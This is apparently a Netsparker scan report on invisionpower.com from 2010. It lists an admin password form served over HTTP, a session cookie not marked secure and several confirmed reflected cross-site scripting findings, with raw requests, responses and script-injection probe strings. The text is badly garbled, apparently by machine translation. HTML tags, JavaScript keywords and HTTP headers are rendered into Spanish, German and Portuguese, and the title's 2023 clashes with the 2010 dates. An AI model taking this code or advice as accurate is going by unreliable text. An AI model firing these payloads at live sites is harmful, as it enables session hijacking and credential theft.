XSS report for https://www.invisionpower.com/index.php, unforgivable vulnerabilities (2023)

Netsparker - Scan Report Summary

TARGET URL	https://www.invisionpower.com/index.php
REVIEW DATE	22.09.2010 18:16:25
REPORT DATE	22.09.2010 20:24:37
SCAN DURATION	00:51:36.5312500

total requests

52849

Average speed

17,07 Anf./Seg.

identified

Confirmed

critical

informative

scan settings

PROFILE	previous settings
MOTORS ACTIVATED	Static testing, lookup for backup files, blind sql injection, boolean sql injection, command injection, http header injection, local file inclusion, open redirection, remote code evaluation, remote file inclusion, file injection sql, cross-site scripting

Attorney

authentication

Planned

vulnerabilities
	IMPORTANT 11% AVERAGE 33% LOW 33% TRAINING 22%

The password is transmitted via HTTP

1 TOTAL

IMPORTANT

CONFIRMED

Netsparker detected that the password data is being sent over HTTP.

influence

If an attacker can intercept network traffic, they can steal user credentials.

Actions to take

See the solution for the solution.
Move all your critical forms and pages to HTTPS and don't serve them over HTTP.

All sensitive data must be transmitted over HTTPS instead of HTTP. Forms must be served over HTTPS. All aspects of the application that accept user input from the login process must be served over HTTPS only.

- /ccs_forums_install/admin/

/ccs_forums_install/admin/CONFIRMED

http://www.invisionpower.com/ccs_forums_install/admin/

target action form

http://www.invisionpower.com/ccs_forums_install/admin/index.php?adsess=&app=core&module=login&do=login-complete

query

GET /ccs_forums_install/admin/HTTP/1.1
See: http://www.invisionpower.com/ccs_forums_install/admin/
User Agent: Mozilla/4.0 (supported; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Hidden control: hidden sin
Host: www.invisionpower.com
Cookie: Session_Id=2be9eafdbb127ce3ae9c6aab822703d2
Accept encoding: gzip, deflate

answers

HTTP/1.1 200 Aceptar
Date: Wednesday, September 22, 2010 22:17:51 GMT
Servidor: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
Powered by X: PHP/5.3.2
Content Length: 4350
Content type: text/html

<!DOCTYPE html PÚBLICO "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang= "en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="tipo-de-contenido" content="text/html; charset=UTF -8" /><meta http-equiv="Pragma" content="sem-cache" /><meta http-equiv="Cache-Control" content="sem-cache" /><meta http-equiv=" Expira" content="Sexo, 01 de enero de 1999 01:00:00 GMT" /><link rel="icono de acceso directo" href='http://www.invisionpower.com/ccs_forums_install/favicon.ico' /> < title >Invision Power Board: Fassadenanmeldung</title><script type='text/javascript'>jsDebug = 1;USE_RTE = 0;isRTL= false;</script><link rel="stylesheet" type="text /css " media='screen' href="http://www.invisionpower.com/ccs_forums_install/public/min/index.php?f=admin/skin_cp/acp.css,admin/skin_cp/acp_content.css,admin /skin_cp /acp_editor.css"><script type='text/javascript' src='http://www.invisionpower.com/ccs_forums_install/public/min/index. php ?g=js'></script <script type='text/javascript' src='http://www.invisionpower.com/ccs_forums_install/public/min/index.php?f=public/js/ipb. js, admin/js/acp.js, admin/js/acp.menu.js, admin/js/acp.livesearch.js, admin/js/acp.styles.js, admin/js/acp.tabs.js' > </script><!-- <script type='text/javascript' src='http://getfirebug.com/releases/lite/1.2/firebug-lite-compressed.js'></script>-- > <script type='text/javascript' language='javascript'>Loader.boot();</script><script type='text/javascript' src='http://www.invisionpower.com/ccs_forums_install/ administrador /js/acp.help.js '></script><script type='text/javascript' language='javascript'>//<![CDATA[ipb.vars['st']= "";ipb . vars['base_url']= " http://www.invisionpower.com/ccs_forums_install/admin/index.php?adsess=&";ipb.vars['front_url']= "http://www.invisionpower.com /ccs_forums_install/index.php?" ;ipb.vars['app_url']= "http://www.invisionpower.com/ccs_forums_install/admin/index.php?adsess=&app=core&";ipb.vars['image_url'] = "http:// www.invisionpower.com/ccs_forums_install/admin/skin_cp/images/";ipb. vars['md5_hash']= "";/* ---- Cookies ----- */ipb.vars['cookie_id'] = '';ipb.vars['cookie_domain'] = '';ipb. vars['cookie_path']= '';ipb.templates['close_popup']= "<img src='http://www.invisionpower.com/ccs_forums_install/public/style_images/master/close_popup.png' alt=' x' />";ipb.templates['page_jump']= new Template("<div id='#{id}_wrap' class='ipbmenu_content'><h3 class='bar'>Ir a página</ h3 ><input type='text' class='input_text' id='#{id}_input' size='8' /> <input type='submit' value='Go' class='input_submit add_folder' id= ' #{id}_submit' /></div>");ipb.templates['ajax_loading'] = "<div id='ajax_loading'>Cargando...</div>";acp = neues IPBACP;/ / ]]></script><script type="text/javascript" src="http://www.invisionpower.com/ccs_forums_install/cache/lang_cache/1/acp.lang.js" charset="UTF-8 " ></script></head><body id='ipboard_body'><div id= 'loading-layer' style='display:none'><div id='loading-layer-shadow'> <div id ='cargando-capa-interior' > <img src='http://www.invisionpower. com/ccs_forums_install/admin/skin_cp/images/loading_anim.gif' style='vertical-align:middle' /> <span style='font-weight:bold' id='loading-layer-text'>Carregando dados. Aguarde...</span> </div></div></div><script type='text/javascript'>if (arriba!= self){arriba.ubicación.href = ventana.ubicación.href; }Evento.observar( ventana, 'cargar', función(e){$('nombre de usuario').focus();});</script><form action='http://www.invisionpower.com/ ccs_forums_install /admin/index.php?adsess=&app=core&module=login&do=login-complete' method='post'><input type='hidden' name='qstring' id='qstring' value='' />< div id='login'><div id='login_controls'><label for='username'>Benutzername oder E-Mail-Ende</label><input type='text' size='20' id='username' name= 'nombre de usuario' value=''><label for='password'>Senha</label><input type='password' size='20' id='password' name='password' value=' '> </ div><div id='login_submit'><input type='submit' class='button' value="Anmelden" /></div></div></formulario></div> </div > </formulario></cuerpo></html>

Cookie not marked as safe

1 TOTAL

IMPORTANT

CONFIRMED

A cookie was not marked as secure and was transmitted over HTTPS. This means that the cookie can be stolen by an attacker who can successfully intercept and decrypt the traffic or follow a successful MITM (the man in the middle) attack.

influence

This cookie is transmitted over an HTTP connection, so if this cookie is important (als Session Cookie) an attacker could intercept it and hijack the victim's session. If the attacker can perform a MITM attack, they can force the victim to make an HTTP request to steal the cookie.

Actions to take

See the solution for the solution.
Mark all cookies used in the app as safe. (If the cookie is not related to authentication or does not contain personal information, you do not need to mark it as secure.))

Mark all cookies used in the app as safe.

Skills Required for Successful Exploration

To exploit this problem, an attacker would need to be able to intercept the traffic. This usually requires local access to the victim's web server or network. Attackers must understand Layer 2, have physical access to systems as gateways for traffic, or be local (had access) to a system between the victim and the web server.

- /

/CONFIRMED

https://www.invisionpower.com/

Identified cookie

session id

query

GET/HTTP/1.1
Ver: https://www.invisionpower.com/index.php
User Agent: Mozilla/4.0 (supported; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Hidden control: hidden sin
Host: www.invisionpower.com
Cookie: Session_Id=2be9eafdbb127ce3ae9c6aab822703d2
Accept encoding: gzip, deflate
Connection: keep alive

answers

HTTP/1.1 200 Aceptar
Date: Wednesday, September 22, 2010 22:16:21 GMT
Servidor: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
Powered by X: PHP/5.3.2
Establecer-Cookie: session_id=578caf105f353c7ddab5b735fdc04521; camino=/; httpssomente
Cache control: no cache, needs to be revalidated, max age = 0
Expires: Tuesday, September 21, 2010 22:16:21 GMT
Pragma: no-cache
Content encoding:
Vary: accept encoding
Content length: 4223
connection: close
Content-type: text/html;charset=UTF-8

<!DOCTYPEhtml
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="es" lang="es" xmlns="http://www.w3.org/1999/xhtml">
<Kopf>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<title>Invision Energy Services | Community- und Forensoftware</title>
<meta name='description' content='Industry-leading forum software provider and integrated blog, gallery, chat and more. At Invision Power Services, we make communities easy.” /><link rel='canonical' href='http://www.invisionpower.com/index.php' />
<link rel="stylesheet" type="text/css" media="screen" href="http://www.invisionpower.com/assets//css/general.css" />

ips.delegate.initialize();
</script>
</head>
<body>
<div id='header'>
<div id='header'>
<a href='http://www.invisionpower.com' title='Página de inicio de IPS, Inc.' id='branding'><img src='http://www.invisionpower.com/assets//images/ logotipo.png' alt='Logotipo' /></a>
</div>
</div>
<div id='external_container'>
<div id=''>
<ul id='main_navigation'>
<li id='nav_products' class='ausgewählt'>
<a href='http://www.invisionpower.com/suite/'>Unsere Suite</a>
<ul id='nav_products_menu' class='main_menu'>
<li><a href='http://www.invisionpower.com/suite/' title='Ein Plataforma IPS'>Ein Plataforma IPS</a></li>
<li><a href='http://www.invisionpower.com/products/' title='See all products'>Produktlinie</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/board/' title='IP.Board Forum Software'>IP.Board</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/blog/' title='Ir para IP.Blog'>IP.Blog</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/gallery/' title='Ir para IP.Gallery'>IP.Gallery</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/content/' title='Ir para IP.Content'>IP.Content</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/chat/' title='Ir para IP.Chat'>IP.Chat</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/downloads/' title='Ir para IP.Downloads'>IP.Downloads</a></li>

<li class='sep'><a href='http://www.invisionpower.com/products/spammonitor/' title='Ir a Spam Monitor'>Spam-Überwachung</a></li>
<li><a href='http://www.invisionpower.com/suite/iphone' title='Go to iPhone App'>iPhone App</a></li>
<li><a href='http://www.invisionpower.com/suite/convert.php' title='IPS Software Converter'>IPS Converter</a></li>
<li><a href='http://www.invisionpower.com/suite/requirements.php' title='Suite-Anforderungen'>Suite-Anforderungen</a></li>
<li><a href='http://www.invisionpower.com/suite/demo.php' title='Try our products'>Try our suite for free</a></li>

</ul>
<script type='text/javascript'>
ips.menus['produtos'] = new ips.menu( $('nav_products'), $('nav_products_menu') );
</script>
</li>
<li id='nav_hosted'>
<a href='/hosting'>Gehostete Communities</a>
<ul id='nav_hosted_menu' class='main_menu'>
<li><a href='http://www.invisionpower.com/hosting/' title='Go to Default Packages'>Standard Package</a></li>
<li><a href='http://www.invisionpower.com/hosting/advanced.php' title='Go to Advanced Packages'>Advanced Packages</a></li>
</ul>
<script type='text/javascript'>
ips.menus['hosted'] = new ips.menu( $('nav_hosted'), $('nav_hosted_menu') );
</script>
</li>
<li id='navigation_services'>
<a href='http://www.invisionpower.com/services/' title='Go to our services overview'>Services</a>
</li>
<li id='nav_support'>
<a href='#'>Support</a>
<ul id='nav_support_menu' class='main_menu'>
<li><a href='http://community.invisionpower.com/resources/documentation/index.html' title='Documentación'> Documentación </a></li>
<li><a href='/cliente/' title='Go to Client Area'>Customer Area</a></li>
<li><a href='http://community.invisionpower.com/index.php?app=ccs' title='Ir al sitio de recursos'>Ressourcen</a></li>
<li><a href='http://community.invisionpower.com' title='Unsere Community-Support-Foren'>Support-Foren</a></li>

<li><a href='http://www.invisionpower.com/company/faq.php' title='Go to FAQ'>Häufig gestellte Fragen</a></li>
<li><a href='http://www.invisionpower.com/hosting/status.php' title=''>Rückstellungsstatus</a></li>
</ul>
<script type='text/javascript'>
ips.menus['support'] = new ips.menu( $('support_nav'), $('support_nav_menu') );
</script>
</li>
<li id='nav_tienda'>
<a href='http://www.invisionpower.com/store/' title='Ir a la tienda'>Tienda</a>
</li>
<li id='nav_community'>
<a href='http://community.invisionpower.com/' title='Visit our own community'>Our community</a>
</li>
<li id='nav_contact'><a href='http://www.invisionpower.com/company/contact.php' title='Entre em contato'>Falle conosco »</a></li>
</ul>
</div>
<div id='container'>

<div id='frontpage_feature'>
<h1>We make communities easy - we are a leading provider of community forum software</h1>
</div>
<div id='latest_news'>
<div>
<strong>Latest news</strong>
<ul id='Ticker'>

<li><span clase='fecha'>07. Septiembre de 2010</span> <a href='http://community.invisionpower.com/topic/320838-ipboard-31x-security-patch-released/' title= 'Ver item' rel='nofollow'>IP. Placa 3.1.x Security Patch lanzado</a></li>

<li><span class='fecha'>2. Agosto de 2010</span> <a href='http://community.invisionpower.com/topic/317877-enhancements-to-ips-support-and-services / ' title='Display Item' rel='nofollow'> IPS Support und Serviceverbesserungen</a></li>

<li><span class='fecha'>20. Julio de 2010</span> <a href='http://community.invisionpower.com/topic/316584-ipboard-312-and-applications-released/' title = 'Ver elemento' rel='nofollow'>IP. Board 3.1.2 y aplicaciones publicadas</a></li>

<li><span clase='fecha'>13. Julio de 2010</span> <a href='http://community.invisionpower.com/topic/315976-donations-for-autism-research-and-support / ' title='Ver artículo' rel='nofollow'> Autismusforschung und Spenden zur Unterstützung</a></li>

</ul>
</div>
</div>
<script type='text/javascript'>
var ticker = new ips.ticker ($('ticker'), {duración: 4});
</script>

<br /><br />
<div style='width: 600px; float: left;'>
<p style='Font size: 18px; row height: 140%; Colour: #303030;'>
<strong>Software for forums, content management, blogs, photo galleries and more.</strong>
</p>
<p style='Font size: 14px; row height: 140%; top margin: 15px;'>
We develop software and services that make it easy to create and maintain an online forum. Our powerful platform can be self-hosted or we can manage it for you.
<br /><br />
We have over 10 years of experience creating and hosting forum software. See what our products can do to learn why websites large and small choose IPS community software to power <em>their</em> forums and communities.
</p>
<br /><br />
<span id='homepage_action'><a href='http://www.invisionpower.com/suite/demo.php' id='button_demo' class='button'>Pruébanos gratis</a> o < a href='http://www.invisionpower.com/suite/'>ver nuestra plataforma →</a></span>
</div>

<div style='width: 280px; move the cursor to the right; left border: 1px solid #dedede; padding links: 20px;'>
<h2 class='cufon'>New Blogs</h2>

<li>
<h3><a href='http://community.invisionpower.com/blog/1174/entry-5344-gallery-4-structural-changes/' rel='nofollow bookmark' title='Gallery 4 - Structural Changes' >Gallery 4 - Structural Changes</a></h3>
<span class='date'><abbr class="published" title="2010-09-22T07:08:00+00:00">Hoje, 07h08</abbr></span>
</li>

<li>
<h3><a href='http://community.invisionpower.com/blog/1174/entry-5296-ipcontent-21-dev-update-tighter-forum-integration/' rel='nofollow bookmark' title=' IP.Content 2.1 Developer Update: Tighter forum integration'>IP.Content 2.1 Developer Update: Tighter forum integration</a></h3>
<span class='date'><abbr class="published" title="2010-09-20T12:51:38+00:00">20. septiembre de 2010 12:51</abbr></span>
</li>

<li>
<h3><a href='http://community.invisionpower.com/blog/1174/entry-5336-ipgallery-40-manifesto/' rel='nofollow bookmark' title='IP.Gallery 4.0 - Manifiesto'> IP.Gallery 4.0 - Manifiesto</a></h3>
<span class='date'><abbr class="published" title="2010-09-17T15:25:00+00:00">17. septiembre de 2010 15:25</abbr></span>
</li>

<li>
<h3><a href='http://community.invisionpower.com/blog/1174/entry-5295-ipcontent-21-dev-update-more-control/' rel='nofollow bookmark' title='IP. Content 2.1 Entwickler Update: Mehr Kontrolle'>IP.Content 2.1 Entwickler Update: Mehr Kontrolle</a></h3>
<span class='date'><abbr class="published" title="2010-09-16T13:22:27+00:00">16. Septiembre 2010 13h22</abbr></span>
</li>

<li>
<h3><a href='http://community.invisionpower.com/blog/1174/entry-5294-ipcontent-21-dev-update-block-improvements/' rel='nofollow bookmark' title='IP. Content Developer Update 2.1: Blocking improvements'>IP.Content Developer Update 2.1: Blocking improvements</a></h3>
<span class='date'><abbr class="published" title="2010-09-13T18:53:06+00:00">13. Septiembre 2010 18h53</abbr></span>
</li>

<li>
<h3><a href='http://community.invisionpower.com/blog/1174/entry-5293-ipcontent-21-dev-update-template-updates/' rel='nofollow bookmark' title='IP. Content Developer 2.1 Update: IP.Content Developer 2.1 Update: Update</a></h3>
<span class='date'><abbr class="published" title="2010-09-02T20:45:00+00:00">02. septiembre de 2010 20:45 horas</abbr></span>
</li>
</ul>

</div>

<h2 class='cufon'>Strengthening communities around the world</h2>
<div id='main_customer_page'>
<img src='http://www.invisionpower.com/assets//images/logos/logo_oreilly.png' alt="O'Reilly Media, Inc." />
<img src='http://www.invisionpower.com/assets//images/logos/logo_nasa.png' alt='NASA' />
<img src='http://www.invisionpower.com/assets//images/logos/logo_emi.png' alt='EMI' />
<img src='http://www.invisionpower.com/assets//images/logos/logo_intuit.png' alt='Intuit Canada ULC' />
<img src='http://www.invisionpower.com/assets//images/logos/logo_nbc.png' alt='Estudios NBC' />
<img src='http://www.invisionpower.com/assets//images/logos/logo_skype.png' alt='Skype' />
<img src='http://www.invisionpower.com/assets//images/logos/logo_falcons.png' alt='Atlanta Falcons' />
</div>

</div>
</div>
<div id='footer_wrap'>
<div id='rodapé'>
<div class='footer_block' id='support_sales'>
<h2 class='cufon'>Support and Sales</h2>
<span class='phone'>1-800-901-5491</span><br />
<span class='phone sub'>+1 804-200-5695</span> <em>outside the US</em>
</div>
<div class='footer_block' id='newsletter'>
<h2 class='cufon'>IPS-Boletín</h2>
<period>
Receive occasional news and updates from IPS.
</span>
<form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
<set of fields>
<input type='hidden' name='redirect' value="http://www.invisionpower.com/company/mailing_list_thanks.php" />
<input type='hidden' name='errorredirect' value="http://www.invisionpower.com/company/mailing_list_error.php" />
<input type="hidden" name="listid" value="156944">
<input type='hidden' name="special id:156944" value="J7MU">
<input type='hidden' name='clientid' value="335011">
<input type='hidden' name='format' value="11094">
<input type='hidden' name='realistid' value="1">
<input type='hidden' name='double option' value="1">

<input type='text' name="fields_email" class='input_text' value='E-Mail senden' onfocus="if(this.value=='E-Mail senden')this.value='' ;" onblur="if(this.value=='')this.value='envío de correo electrónico';" />
<input type="enviar" name="Enviar" value="Suscribirse" id='button_newsletter' class='input_submit button' />
</set of fields>
</form>
</div>
<div class='footer_block' id='about_us'>
<h2 class='cufon'>About us</h2>
For 10 years, we've been a leading provider of community and forum software for individuals and businesses.
</div>
</div>
</div>
<div id='footer_links'>
<a href='http://www.invisionpower.com/legal/privacy.php'>Privacy Policy</a>
<a href='http://www.invisionpower.com/company/standards.php'>Service Standards</a>
<a href='http://www.invisionpower.com/legal/hosting_policies.php'>Hosting-Richtlinien</a>
<a href='http://community.invisionpower.com'>IPS Enterprise-Foren</a>
<br />
<span id='copyright'>© 2009 Invision Power Services, Inc. (unterstützt von IP.Content)</span>
</div>
<script type="text/javascript">Cufon.ahora(); </script>
<script id="pap_x2s6df8d" src="http://afiliado.invisionpower.com/scripts/clickjs.php" type="text/javascript">
</script>
<script type="text/javascript">

</script>
<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-2199880-1']);
_gaq.push(['_trackPageview']);

(issue() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = documento.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

</script>
<img src='/ccs_forums_install/index.php?app=core&module=task' alt='' style='border: 0px;height:1px;width:1px;' /></cuerpo>
</html>

Script Entry Pages

6 TOTALS

AVERAGE

CONFIRMED

XSS (Cross-Site Scripting) allows an attacker to execute a dynamic script (JavaScript, VBScript) in connection with the application. This allows for a number of different attack vectors, most notably hijacking the user's current session or altering the appearance of the page by modifying the HTML code on the fly to steal the user's credentials. This is because the browser interpreted a user's input as HTML/Javascript/VbScript.

XSS targets the users of the app instead of the server. While this is a limitation because attackers can hijack other users' sessions, an attacker can target an administrator to take complete control of the application.

influence

There are many different attacks that can be exploited through the use of XSS, including:

Active user session hijacking
Change the appearance of the page in the victim's browser.
Running a successful phishing attack.
Intercept data and perform man-in-the-middle attacks.

The problem occurs because the browser interprets the input as active HTML, Javascript, or VbScript. To prevent this, all application inputs and outputs must be filtered. The output should be filtered by the format and location of the output. Typically, the output location is HTML. If the output is HTML, be sure to remove all active content before sending it to the server.

Before you sanitize user input, make sure you have a predefined list of expected and acceptable characters that you use to populate a whitelist. This list should only be defined once and should be used to clear and validate all subsequent entries.

There are a number of well-structured, predefined whitelisting libraries for many different environments, good examples are:OWASP ReformmiMicrosoft Cross Site Anti-Site ScriptsLibraries are good examples.

medicine references

external references

- /index.php

/index.phpCONFIRMED

https://www.invisionpower.com/index.php?'><script>alerta(9)</script>

Parameter

Parameter	model	courage
query-based	QUERY STRING	'><script>alerta(9)</script>

query

GET /index.php?'><script>netsparker(9)</script> HTTP/1.1
User Agent: Mozilla/4.0 (supported; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Hidden control: hidden sin
Host: www.invisionpower.com
Cookie: Session_Id=2be9eafdbb127ce3ae9c6aab822703d2
Accept encoding: gzip, deflate

answers

HTTP/1.1 200 Aceptar
Date: Wednesday, September 22, 2010 22:29:32 GMT
Servidor: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
Powered by X: PHP/5.3.2
Cache control: no cache, must revalidate, max-age=0
Expires: Monday, Jul 26, 1997 05:00:00 GMT
Pragma: no-cache
Content encoding:
Vary: accept encoding
Content Length: 3049
connection: close
Content type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<Kopf>
<title>Invision Power Services :: archivo 404 no encontrado</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<style type='text/css' media='all'>/* Ignore CSS loading since inheritance is enabled */@import url( 'https://www.invisionpower.com/public/style_images// css_1.css' );@Import-URL( 'https://www.invisionpower.com/public/style_images//css_3.css' );</style>
<style type='text/css'>
@Import-URL('https://www.invisionpower.com/ipscss/ipsmenu.css');
</style>
<script type="text/javascript">//<![CDATA[var ipb_var_st = "";var ipb_var_base_url = "http://www.invisionpower.com";var ipb_var_script_url = "http://www.invisionpower.com/index.php?appcomponent=core&module=pages";var ipb_var_cookieid = "";var ipb_var_cookie_domain = ".invisionpower.com";var ipb_var_cookie_path = "";var ipb_skin_url = "https ://www.invisionpower.com/public/style_images/default";var ipb_md5_check = "880ea6a14ea49e853634fbdc5015a024";var use_enhanced_js = 1;var cust_data_id = parseInt("0");var member_display_name = "";//]]>< /script><script type="text/javascript" src="https://www.invisionpower.com/cache/lang_cache/1/lang_javascript.js"></script><script type="text/javascript" src ="https://www.invisionpower.com/public/clientscripts/ips_ipsclass.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts /ips_global.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clie ntsc ripts/ips_menu.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/ips_xmlhttprequest.js"></script><Skripttyp = "texto/javascript" src="https://www.invisionpower.com/public/clientscripts/dom-drag.js"></script><script type="texto/javascript" src="https:// www .invisionpower.com/public/clientscripts/prototype.js"></script><script type="text/javascript">//<![CDATA[var ipsclass = new ipsclass();ipb_var_script_url = ipb_var_script_url.replace( / &/g, '&' ) + '&';ipb_var_script_url_no_module = ipb_var_script_url.replace( /&module=(.+?)&/, '&' );//]]></script>

<meta name="verificar-v1" content="+Sm+DgwPKivtcVCe9RPchbAyC8I4pFnXtHLaXfWUsVA=" />
</head>

<body>
<div id='main_container'>

<div id='head_menu_container'>
<div class='_head_menu_bg'></div>
<div id='search_site'>
<form id="searchbox_003857263146498806944:jkwuw2zfm7i" action="http://www.invisionpower.com/corporate/googlesearch.html"><input type=" hidden " name="cx" value="003857263146498806944:jkwuw2zfm7i" /><entry type="hidden" name="cof" value="FORID:11" />
<input class='off' type='text' size='15' name='q' value='Pesquisar...' onfocus="if(this.value=='Pesquisar...'){this. value='';this.className='on'}" onblur="if(this.value==''){this.value='Buscar...';this.className='off'}" /> <input type='submit' value='Los' name='sa' class='submit' />
</form>
</div>
<ul>
<li id='li_corp'><a href="http://www.invisionpower.com/corporate/index.html" title='Corporate'>Unternehmen</a></li>
<li id='li_community'><a href="http://www.invisionpower.com/community/index.html" title='Community'>Community</a></li>
<li id='li_business'><a href="http://www.invisionpower.com/business/index.html" title='Business'>Geschäfte</a></li>
<li id='li_hosting'><a href="http://www.invisionpower.com/hosting/index.html" title='Hosting'>hostedagem</a></li>
<li id='li_resources'><a href='http://resources.invisionpower.com' title='Resources'>recursos</a></li>
<li id='li_client'><a href="http://www.invisionpower.com/customer/index.html" title='Kundenbereich'>Kundenbereich</a></li>
</ul>
<script type='text/javascript'>
/* Set navigation to the right... */
var _url = window.location.toString();
var _folder = _url.replace( /^.*\/(corporate|community|business|hosting|client)\/.*$/i, "$1" );
var_id = '';

Toggle ( _Folder )
{
Meeting:
Case "Company":
_id='Firma';
Break time;
Case 'Community':
Case 'Business':
Autumn 'Accommodation':
_id = _pasta;
Break time;
Case 'Customer':
_id = 'Customer';
Break time;
}

document.getElementById( 'li_' + _id ).className = 'selecionado';
</script>
</div>
<div id='header'>
<h1>Invision Power Services, Inc.</h1>
</div>

<li><a href="http://forums.invisionpower.com" title="">Unternehmensforen</a></li>

<li>

<a href="http://www.invisionpower.com/customer/index.html" title="">Kundenbereich</a>

<div class='side_box'>
<h5>Call us</h5>
If you have any questions, feel free to contact us!<br /><br />

<span class='tel_no'>+1 804-200-5695</span><br />
<span class='tel_info'>outside the US</span><br /> <br />
</div>

<br />
<div class='side_box'>
<h5>Get Updates</h5>
Sign up to receive updates on IPS products and services<br /><br />
<form method=post action="http://subscribe.invisionpower.com/box.php" accept-charset='utf-8' target="_blank"><input name="funcml" type="hidden" value ="adicionar" marcado>Inscrever-se
<entry name="p" type="hidden" id="p" value="1">
<input type="hidden" name="nlbox[1]" value="2">
<input type="text" name="email" value="E-Mail senden" maxlength="128" class="ml_text" onfocus="if(this.value=='E-Mail senden')this .value =''; " onblur="if(this.value=='')this.value='envío de correo electrónico';" /><br />

<input type='submit' name='Enviar' value='Inscrever-se' class='ml_submit' />
</form>
</div>
</div>
<div id='body'> <div class='content'>
<h2>404: File not found</h2>
If you believe you have reached this page in error, please <a href='http://www.invisionpower.com/corporate/contact.html'>contact us</a> or submit a report to our <a href= ' http ://forums.invisionpower.com/index.php?autocom=bugtracker&code=show_project&product_id=18'>Bugtracker</a> and tell us how you got here.
<br /> <br />
/index.php?'><script>netsparker(9)</script>
</div></div>

</div>

<span class='_clear'></span>
<div id='footer_container'>
<ul>
<li><a href='http://www.invisionpower.com/corporate/contact.html' title='Contate-nos'>Falle conosco</a> |</li>
<li><a href='http://forums.invisionpower.com/' title='Corporate Forums'>Corporate Forums</a> |</li>
<li><a href='https://www.invisionpower.com/customer/index.html' title='Kundenbereich'>Kundenbereich</a> |</li>
<li><a href='http://www.invisionpower.com/corporate/privacy.html' title='Privacy Policy'>Privacy Policy</a> |</li>
<li><a href='http://www.invisionpower.com/corporate/standards.html' title='Serviceerklärung'>Serviceerklärung</a></li>
</ul>
<span class='copyright'>© 2008 Invision Power Services, Inc.</span>
<span class='_clear'></span>
</div>
</div>

<script language="javascript" type="text/javascript">
wo lpPosY = 100;
</script>

<script language='javascript' src='http://server.iad.liveperson.net/hc/36704500/x.js?cmd=file&file=chatScript3&site=36704500&&imageUrl= http://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a'> </script><div id='ipd-msg-wrapper' class='error_box' style='display:none'><div id='ipd-msg-title'><h3 ><a href='#' onclick='document.getElementById("ipd-msg-wrapper").style.display="none"; return false;'><img src='https://www.invisionpower.com/public/style_images/default/system/close.png' alt='X' title='Fechar janela' class='ipd'>< /a> Nachrichten zur Website</h3></div><p id='ipd-msg-text'></p></div><script type='text/javascript'>//<![CDATA [ show_inline_messages();menu_do_global_init();//]]></script><img src='https://www.invisionpower.com/index.php?appcomponent=core&module=task ' borde='0' altura='1' ancho='1' /></cuerpo>
</html>

- /index.php

/index.phpCONFIRMED

https://www.invisionpower.com/index.php?'"--><script>alerta(0x000613)</script>

Parameter

Parameter	model	courage
application component	TAKE IT	bill
Module	TAKE IT	order assistant
Section	TAKE IT	query
model	TAKE IT	PACKAGES
List	TAKE IT	209
query-based	QUERY STRING	'"--><script>Alarma(0x000613)</script>

query

GET /index.php?'"--><script>netsparker(0x000613)</script> HTTP/1.1
See: http://www.invisionpower.com/hosting/advanced.php
User Agent: Mozilla/4.0 (supported; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Hidden control: hidden sin
Host: www.invisionpower.com
Cookie: Session_Id=2be9eafdbb127ce3ae9c6aab822703d2
Accept encoding: gzip, deflate

answers

HTTP/1.1 200 Aceptar
Date: Wednesday, September 22, 2010 22:33:10 GMT
Servidor: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
Powered by X: PHP/5.3.2
Cache control: no cache, must revalidate, max-age=0
Expires: Monday, Jul 26, 1997 05:00:00 GMT
Pragma: no-cache
Content encoding:
Vary: accept encoding
Content length: 3058
connection: close
Content type: text/html

document.getElementById( 'li_' + _id ).className = 'selecionado';
</script>
</div>
<div id='header'>
<h1>Invision Power Services, Inc.</h1>
</div>

<li><a href="http://forums.invisionpower.com" title="">Unternehmensforen</a></li>

<li>

<a href="http://www.invisionpower.com/customer/index.html" title="">Kundenbereich</a>

<div class='side_box'>
<h5>Call us</h5>
If you have any questions, feel free to contact us!<br /><br />

<span class='tel_no'>+1 804-200-5695</span><br />
<span class='tel_info'>outside the US</span><br /> <br />
</div>

</div>

- /index.php

/index.phpCONFIRMED

http://www.invisionpower.com/index.php?'"--><script>alerta(0x000631)</script>

Parameter

Parameter	model	courage
	TAKE IT
application component	TAKE IT	basic
Module	TAKE IT	Customers area
Section	TAKE IT	Casa
